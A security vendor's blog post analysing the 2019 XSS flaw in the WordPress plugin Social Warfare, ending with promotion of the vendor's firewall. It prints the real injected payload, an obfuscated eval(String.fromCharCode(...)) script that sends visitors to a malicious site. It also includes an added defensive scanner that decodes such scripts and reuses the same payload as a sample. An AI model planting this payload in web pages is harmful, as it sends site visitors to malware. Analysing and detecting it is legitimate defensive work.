"WordPress plugin Social Warfare exposes sites to XSS attacks" was the alert that went out on March 21st 2019. A plugin named "Social Warfare" used by WordPress sites allowed hackers to inject code into their websites; it's estimated that 70,000 websites were affected. It was labelled as a "Zero-Day" attack, which has always confused me because at one time every exploit was a "Zero-Day" attack. It was reported that many hackers were already out there in the wild looking for websites that had the unpatched version of Social Warfare.
How XSS Works
Step 1) Hacker finds a vulnerable website
Step 2) Injects JavaScript code into the vulnerable website
Step 3) Victim visits the website
Step 4) Victim website visitor is redirected to another, malicious website
Step 5) Victim unknowingly clicks and downloads malicious software
Step 5 is where the real damage gets done, with the help of an unpatched/unprotected website.
So what do the above 5 steps look like in real life?
I actually visited a website that had been compromised by the XSS attack. The site, which has some free tools to do network lookups, trace-routes, etc., is one I have been using for over 15 years. This day when I visited, I was greeted by some porn site complete with a 5 second video loop. I knew something was wrong right away; I checked my URL and yes, I had the right destination, but the wrong content for sure. I waited a couple of hours and tried again, and this time the content was different, as you can see below
I can only assume that the hackers could fool some people into installing the fake Mac cleaner, having just had some random porn content pop up in their browser.
Strange as it seems, this site is still active as I write this piece 3 days later!
Back to the main story... I wanted to see the code that was injected into the unsuspecting website participating in the attack, the code that would lead website visitors to another website that they never intended to visit.
The attacker used XSS to include the following JavaScript into the page head:
<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 108, 108, 116, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 101, 116, 102, 111, 114, 99, 111, 110, 102, 105, 103, 112, 108, 101, 97, 115, 101, 46, 99, 111, 109, 47, 119, 101, 110, 98, 51, 52, 104, 103, 113, 102, 99, 97, 53, 54, 55, 53, 54, 56, 57, 53, 55, 57, 46, 112, 104, 112, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 108, 108, 116, 32, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 108, 108, 116, 32, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 108, 108, 116, 59));</script>"><meta property="twitter_creator" content="@"><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 108, 108, 116, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 101, 116, 102, 111, 114, 99, 111, 110, 102, 105, 103, 112, 108, 101, 97, 115, 101, 46, 99, 111, 109, 47, 119, 101, 110, 98, 51, 52, 104, 103, 113, 102, 99, 97, 53, 54, 55, 53, 54, 56, 57, 53, 55, 57, 46, 112, 104, 112, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 108, 108, 116, 32, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 108, 108, 116, 32, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 108, 108, 116, 59));</script>">
This is a browser redirect to a different page: the character codes decode to a short script that stores a URL in a variable and then sends the visitor there three ways (document.location.replace; document.location.href; window.location.href).
There are probably thousands of websites that don't even know their sites are infected and participating in such an attack.
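To inspect such a payload without running it, here is an added example (not code from the original post or from DOSarrest) that scans page HTML for eval(String.fromCharCode(...)) obfuscation, decodes the character codes with String.fromCharCode itself instead of eval, and flags scripts that change the browser location. The sample page head is constructed; its character codes are copied from the injection quoted above.

```javascript
// Added example, not from the original post: a defender-side scanner for the
// eval(String.fromCharCode(...)) obfuscation used in the Social Warfare injection.
// The payload is decoded with String.fromCharCode only; nothing is executed.

const EVAL_CHARCODE = /eval\(\s*String\.fromCharCode\(\s*([\d\s,]+)\)\s*\)/g;

// Any of these in the decoded text means the script navigates the visitor away.
const REDIRECT_HINTS = [
  /document\.location\.replace\s*\(/,
  /document\.location\.href\s*=/,
  /window\.location\.href\s*=/,
  /location\.assign\s*\(/,
];

function decodeCharCodes(list) {
  // "118, 97, 114" -> "var"; blank entries (trailing commas) are dropped.
  const codes = list.split(',').map(s => s.trim()).filter(Boolean).map(Number);
  return String.fromCharCode(...codes);
}

function findObfuscatedScripts(html) {
  const findings = [];
  for (const m of html.matchAll(EVAL_CHARCODE)) {
    const decoded = decodeCharCodes(m[1]);
    findings.push({
      offset: m.index,                                   // where in the HTML it sits
      decoded,                                           // the de-obfuscated script
      urls: decoded.match(/https?:\/\/[^\s"']+/g) || [], // destinations it names
      isRedirect: REDIRECT_HINTS.some(r => r.test(decoded)),
    });
  }
  return findings;
}

// Constructed sample head: a benign inline script plus the injected script from the post
// (character codes copied from it). Only the injected script should be reported.
const SAMPLE_HEAD = `<head>
<meta property="og:title" content="Network tools">
<script>console.log("benign inline script");</script>
<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 108, 108, 116, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 101, 116, 102, 111, 114, 99, 111, 110, 102, 105, 103, 112, 108, 101, 97, 115, 101, 46, 99, 111, 109, 47, 119, 101, 110, 98, 51, 52, 104, 103, 113, 102, 99, 97, 53, 54, 55, 53, 54, 56, 57, 53, 55, 57, 46, 112, 104, 112, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 108, 108, 116, 32, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 108, 108, 116, 32, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 108, 108, 116, 59));</script>
</head>`;

for (const f of findObfuscatedScripts(SAMPLE_HEAD)) {
  console.log(`offset ${f.offset} redirect=${f.isRedirect} urls=${f.urls.join(',')}`);
  console.log(`decoded: ${f.decoded}`);
}
```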
What does this mean for DOSarrest customers? Nothing really, because if you have our WAF enabled you were protected pre-"Zero-day". That's right, you were protected before the exploit was even discovered. Our WAF is based on a positive security model, not a negative model that relies on signatures of malicious code. All the panic was that this new exploit does not have a signature yet that WAF admins can upload to their systems.
All of the numbers and commas above would never have been able to pass through our WAF.
There are no signatures in a positive-model based WAF!!!
Here's a real-time view of attempted XSS attacks that we block, from a sample of our customer base.
http://attackmap.ddos-protection.org
Tip! You can toggle on/off the types of attacks you want to see and their source IPs.
Mark Teolis
CEO, DOSarrest Internet Security